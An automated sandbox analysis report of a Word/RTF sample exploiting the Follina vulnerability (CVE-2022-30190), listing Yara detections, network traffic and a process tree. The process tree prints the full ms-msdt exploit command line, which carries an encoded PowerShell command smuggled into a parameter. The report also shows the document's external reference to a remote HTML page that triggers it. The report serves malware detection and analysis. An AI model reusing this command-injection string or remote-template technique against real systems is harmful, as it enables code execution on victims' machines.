Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20220531_180800.rtf

Overview

General Information

Sample Name:20220531_180800.rtf
Analysis ID:639039
MD5:7b9c8e08371550238fbcd7cee1c8087d
SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
Infos:

Detection

Follina CVE-2022-30190
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Detected suspicious Microsoft Office reference URL
Obfuscated document found, RTF is a DOCX
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7100 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak
  • 0x39:$a1: <Relationships
  • 0x3b9:$a2: TargetMode="External"
  • 0x3b1:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b9:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x113c:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x113c:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x113c:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x1c84:$sa1: msdt.exe
        • 0x1cc0:$sa1: msdt.exe
        • 0x2188:$sa1: msdt.exe
        • 0x38b5:$sa1: msdt.exe
        • 0x1d98:$sb2: IT_BrowseForFile=
        • 0x3921:$sb2: IT_BrowseForFile=
        00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2890:$sa1: msdt.exe
        • 0x2964:$sb2: IT_BrowseForFile=
        00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x22d0:$sa1: msdt.exe
        • 0x230c:$sa1: msdt.exe
        • 0x27d4:$sa1: msdt.exe
        • 0x23e4:$sb2: IT_BrowseForFile=
        00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2618:$sa1: msdt.exe
        • 0x60a8:$sa1: msdt.exe
        • 0x18c06:$sa1: msdt.exe
        • 0x16c28:$sb2: IT_BrowseForFile=
        Process Memory Space: msdt.exe PID: 7100SUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0xccd:$sa1: msdt.exe
        • 0x32ec:$sa1: msdt.exe
        • 0x488e:$sa1: msdt.exe
        • 0x8d4c:$sa1: msdt.exe
        • 0xbd02:$sa1: msdt.exe
        • 0x12fd5:$sa1: msdt.exe
        • 0x12ff2:$sa1: msdt.exe
        • 0x13255:$sa1: msdt.exe
        • 0x139b6:$sa1: msdt.exe
        • 0x14d9a:$sa1: msdt.exe
        • 0x14db7:$sa1: msdt.exe
        • 0x14ddb:$sa1: msdt.exe
        • 0x14dfb:$sa1: msdt.exe
        • 0x14e70:$sa1: msdt.exe
        • 0x1c10e:$sa1: msdt.exe
        • 0x1f0c4:$sa1: msdt.exe
        • 0x22589:$sa1: msdt.exe
        • 0x24ae4:$sa1: msdt.exe
        • 0x27a9a:$sa1: msdt.exe
        • 0x2af61:$sa1: msdt.exe
        • 0x2f9c8:$sa1: msdt.exe

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Exploits

        barindex
        Yara detected Microsoft Office Exploit Follina CVE-2022-30190
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED
        Detected suspicious Microsoft Office reference URL
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
        Source: global trafficDNS query: name: cyberleague.co
        Source: global trafficTCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.aadrm.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.office.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.onedrive.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.entity.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cortana.ai/api
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cr.office.com
        Source: ~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp.0.drString found in binary or memory: https://cyberleague.co/th1s.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://directory.services.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.windows.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.windows.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://invites.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.local
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
